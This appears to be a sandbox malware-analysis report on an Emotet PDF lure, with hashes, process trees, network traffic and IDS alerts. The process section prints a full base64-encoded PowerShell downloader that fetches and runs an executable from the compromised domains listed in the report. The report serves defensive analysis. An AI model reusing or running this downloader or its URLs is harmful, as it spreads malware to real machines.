analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Bankofamerica Instructions VJQ 736120.pdf

Full analysis: https://app.any.run/tasks/0be826e7-1493-4c77-b144-d52e49e24e97
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: February 11, 2019, 08:06:25
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
generated-doc
trojan
loader
emotet-doc
emotet
Indicators:
MIME: application/pdf
File info: PDF document, version 1.3
MD5:

34BBB6317CBD09EF35BA89F1B62C3FC6

SHA1:

EFDC7B76CF93C42BAB1E7746A81DD2BF5EDEC212

SHA256:

05987B1F545E650E6CC1A4A5F9B2B0A739A7928960EB38A7CD4F52B758D0ECA1

SSDEEP:

192:BOwGzcN7Yuf6yXNfi/MJCFkjk2/O9pkVkuGtkrjZRZiffoT8z8Jm8v43f:8wKM7Yut08Y2/O9pkV9GtkpRZinlwXgP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3776)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 3776)
    • Application was dropped or rewritten from another process

      • 584.exe (PID: 3400)
    • Downloads executable files from the Internet

      • Powershell.exe (PID: 3652)
    • Request from PowerShell which ran from Office

      • Powershell.exe (PID: 3652)
  • SUSPICIOUS

    • Starts Internet Explorer

      • AcroRd32.exe (PID: 2988)
    • Starts Microsoft Office Application

      • iexplore.exe (PID: 3856)
      • WINWORD.EXE (PID: 3776)
    • Application launched itself

      • WINWORD.EXE (PID: 3776)
    • Creates files in the program directory

      • AdobeARM.exe (PID: 2952)
    • Creates files in the user directory

      • Powershell.exe (PID: 3652)
    • Executable content was dropped or overwritten

      • Powershell.exe (PID: 3652)
  • INFO

    • Changes internet zones settings

      • iexplore.exe (PID: 3856)
    • Application launched itself

      • iexplore.exe (PID: 3856)
      • RdrCEF.exe (PID: 1832)
      • AcroRd32.exe (PID: 2988)
    • Creates files in the user directory

      • iexplore.exe (PID: 2440)
      • AcroRd32.exe (PID: 2988)
      • WINWORD.EXE (PID: 3776)
    • Reads internet explorer settings

      • iexplore.exe (PID: 2440)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2440)
    • Dropped object may contain Bitcoin addresses

      • WINWORD.EXE (PID: 3776)
      • iexplore.exe (PID: 2440)
      • Powershell.exe (PID: 3652)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2428)
      • WINWORD.EXE (PID: 3776)
    • Application was crashed

      • 584.exe (PID: 3400)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.pdf | Adobe Portable Document Format (100)

EXIF

PDF

ModifyDate: 2019:02:08 22:54:05+03:00
CreateDate: 2019:02:08 22:54:05+03:00
Producer: dompdf + CPDF
PageCount: 1
Linearized: No
PDFVersion: 1.3
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
48
Monitored processes
13
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start acrord32.exe acrord32.exe no specs rdrcef.exe no specs rdrcef.exe no specs rdrcef.exe no specs iexplore.exe iexplore.exe winword.exe no specs winword.exe no specs powershell.exe adobearm.exe no specs reader_sl.exe no specs 584.exe

Process information

PID
CMD
Path
Indicators
Parent process
2988"C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\admin\AppData\Local\Temp\Bankofamerica Instructions VJQ 736120.pdf"C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
explorer.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
MEDIUM
Description:
Adobe Acrobat Reader DC
Exit code:
1
Version:
15.23.20070.215641
2352"C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --type=renderer "C:\Users\admin\AppData\Local\Temp\Bankofamerica Instructions VJQ 736120.pdf"C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeAcroRd32.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe Acrobat Reader DC
Exit code:
1
Version:
15.23.20070.215641
1832"C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16448250C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeAcroRd32.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
MEDIUM
Description:
Adobe RdrCEF
Exit code:
3221225547
Version:
15.23.20053.211670
3488"C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-3d-apis --disable-databases --disable-direct-npapi-requests --disable-file-system --disable-notifications --disable-shared-workers --disable-direct-write --lang=en-US --lang=en-US --log-severity=disable --product-version="ReaderServices/15.23.20053 Chrome/45.0.2454.85" --device-scale-factor=1 --enable-delegated-renderer --num-raster-threads=2 --gpu-rasterization-msaa-sample-count=8 --content-image-texture-target=3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel="1832.0.1985366828\64233931" --allow-no-sandbox-job /prefetch:673131151C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeRdrCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe RdrCEF
Exit code:
0
Version:
15.23.20053.211670
3560"C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-3d-apis --disable-databases --disable-direct-npapi-requests --disable-file-system --disable-notifications --disable-shared-workers --disable-direct-write --lang=en-US --lang=en-US --log-severity=disable --product-version="ReaderServices/15.23.20053 Chrome/45.0.2454.85" --device-scale-factor=1 --enable-delegated-renderer --num-raster-threads=2 --gpu-rasterization-msaa-sample-count=8 --content-image-texture-target=3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel="1832.1.1368322876\1124427651" --allow-no-sandbox-job /prefetch:673131151C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeRdrCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe RdrCEF
Exit code:
0
Version:
15.23.20053.211670
3856"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exe
AcroRd32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2440"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3856 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3776"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\ACC30726442396401[1].doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2428"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3652Powershell -e JAB6AEUAdwBRAG4AQwBJAFIAPQAoACcAUAAnACsAJwBYADgANQAnACsAJwBVAFEAJwApADsAJAByAGoANwBkAFIAegBDAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEASABPADgAbgBqAD0AKAAnAGgAdAB0AHAAOgAvACcAKwAnAC8AbABpAHYAaQBuAGcAcwBvAGwAJwArACcAaQB0ACcAKwAnAHUAJwArACcAZABlAC4AYwBvAG0ALwAnACsAJwBIAFEAZgAnACsAJwBoAE4AUAA1AEkAQABoACcAKwAnAHQAdABwACcAKwAnADoALwAvACcAKwAnAGoAYQAnACsAJwBzACcAKwAnAHAAaQBuAGYAbwAnACsAJwByAG0AJwArACcAYQB0AGkAYwBhAC4AYwBvAG0ALwAnACsAJwBnAFYAUABzACcAKwAnAFYAMABQACcAKwAnAFMAUgBTAEAAaAB0AHQAcAA6AC8AJwArACcALwAnACsAJwBpAGQAaQBnAGkAdABvACcAKwAnAC4AbgBlAHQALwAyACcAKwAnAEYAbwA3ADIAJwArACcAVABpACcAKwAnAFoASgBAAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AYgAnACsAJwBlAHoAJwArACcAbwBlAGsAYgBvAHMAJwArACcAbgBpACcAKwAnAGUALgBuAGwALwBMAFYAeQBRAGUAWAB0AFcAdQBAAGgAdAB0AHAAJwArACcAOgAvAC8AdwB3AHcALgBlAGwAcgBhAGMAbwBzAGUAYwByAGUAdAAuAGMAbwBtAC8AcgAnACsAJwBiADMAeABSAGQAYwAnACsAJwBoACcAKQAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAEgAZgBUAHMAMgBBAD0AKAAnAGoAJwArACcATAA0ADQARQAnACsAJwBrAFQARgAnACkAOwAkAFgAegBDAFYAQwBiADcAIAA9ACAAKAAnADUAJwArACcAOAA0ACcAKQA7ACQAagA4AEYAMwBqAFoAOABUAD0AKAAnAHUAcgAnACsAJwBFADcAUQB6AFgAJwApADsAJABhADcAawBIAEEAdwBmAEYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFgAegBDAFYAQwBiADcAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABMAE8ANgBmAGgATQA5ACAAaQBuACAAJABhAEgATwA4AG4AagApAHsAdAByAHkAewAkAHIAagA3AGQAUgB6AEMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQATABPADYAZgBoAE0AOQAsACAAJABhADcAawBIAEEAdwBmAEYAKQA7ACQASwB3AFIANQBaADcAPQAoACcAQwBzAEUAMgAnACsAJwBVACcAKwAnAGMAJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAYQA3AGsASABBAHcAZgBGACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAYQA3AGsASABBAHcAZgBGADsAJABMAEQAbgB3AFQANQBxAD0AKAAnAG0AJwArACcAaQB3ADgAegB6ACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABRAHAAMwBZAEQAcAA2AD0AKAAnAHYAJwArACcAbABJACcAKwAnAG4AaQBPACcAKQA7AA== C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
3 220
Read events
2 607
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
8
Text files
29
Unknown types
17

Dropped files

PID
Process
Filename
Type
2352AcroRd32.exeC:\Users\admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
MD5:
SHA256:
2352AcroRd32.exeC:\Users\admin\AppData\Local\Temp\acrord32_sbx\A9R1uuqiwx_11s3slg_1tc.tmp
MD5:
SHA256:
2352AcroRd32.exeC:\Users\admin\AppData\Local\Temp\acrord32_sbx\A9R9ly9vi_11s3slj_1tc.tmp
MD5:
SHA256:
2352AcroRd32.exeC:\Users\admin\AppData\Local\Temp\acrord32_sbx\A9Rc0tlie_11s3sli_1tc.tmp
MD5:
SHA256:
2352AcroRd32.exeC:\Users\admin\AppData\Local\Temp\acrord32_sbx\A9R4j0aea_11s3slh_1tc.tmp
MD5:
SHA256:
3856iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico
MD5:
SHA256:
3856iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
2352AcroRd32.exeC:\Users\admin\AppData\Local\Temp\acrord32_sbx\A9Rl7r08f_11s3slk_1tc.tmp
MD5:
SHA256:
3856iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF6D6AC3798973EF1A.TMP
MD5:
SHA256:
3776WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE034.tmp.cvr
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
10
DNS requests
9
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3652
Powershell.exe
GET
178.62.120.82:80
http://livingsolitude.com/HQfhNP5I
GB
suspicious
2440
iexplore.exe
GET
301
191.6.198.133:80
http://angullar.com.br/US/info/Invoice_Notice/iwJF-eOKZ_z-uh5
BR
html
270 b
malicious
2440
iexplore.exe
GET
200
191.6.198.133:80
http://angullar.com.br/US/info/Invoice_Notice/iwJF-eOKZ_z-uh5/
BR
xml
173 Kb
malicious
2988
AcroRd32.exe
GET
304
2.16.186.33:80
http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/message.zip
unknown
whitelisted
3652
Powershell.exe
GET
301
86.109.170.198:80
http://jaspinformatica.com/gVPsV0PSRS
ES
html
246 b
malicious
3652
Powershell.exe
GET
200
86.109.170.198:80
http://jaspinformatica.com/gVPsV0PSRS/
ES
executable
461 Kb
malicious
2988
AcroRd32.exe
GET
304
2.16.186.33:80
http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/281_15_23_20070.zip
unknown
whitelisted
2988
AcroRd32.exe
GET
304
2.16.186.33:80
http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/277_15_23_20070.zip
unknown
whitelisted
2988
AcroRd32.exe
GET
304
2.16.186.33:80
http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/278_15_23_20070.zip
unknown
whitelisted
2988
AcroRd32.exe
GET
304
2.16.186.33:80
http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/280_15_23_20070.zip
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3856
iexplore.exe
13.107.21.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
2.18.233.74:443
armmf.adobe.com
Akamai International B.V.
whitelisted
2988
AcroRd32.exe
2.18.233.74:443
armmf.adobe.com
Akamai International B.V.
whitelisted
3652
Powershell.exe
86.109.170.198:80
jaspinformatica.com
Abansys & Hostytec, S.L.
ES
malicious
3652
Powershell.exe
178.62.120.82:80
livingsolitude.com
Digital Ocean, Inc.
GB
suspicious
23.210.248.251:443
ardownload2.adobe.com
Akamai International B.V.
NL
whitelisted
2988
AcroRd32.exe
2.16.186.33:80
acroipm2.adobe.com
Akamai International B.V.
whitelisted
2440
iexplore.exe
191.6.198.133:80
angullar.com.br
IPV6 Internet Ltda
BR
malicious

DNS requests

Domain
IP
Reputation
acroipm2.adobe.com
  • 2.16.186.33
  • 2.16.186.32
whitelisted
armmf.adobe.com
  • 2.18.233.74
whitelisted
www.bing.com
  • 13.107.21.200
  • 204.79.197.200
whitelisted
angullar.com.br
  • 191.6.198.133
malicious
livingsolitude.com
  • 178.62.120.82
suspicious
ardownload2.adobe.com
  • 23.210.248.251
whitelisted
jaspinformatica.com
  • 86.109.170.198
unknown

Threats

PID
Process
Class
Message
2440
iexplore.exe
A Network Trojan was detected
ET TROJAN Possible malicious Office doc hidden in XML file
3652
Powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3652
Powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3652
Powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info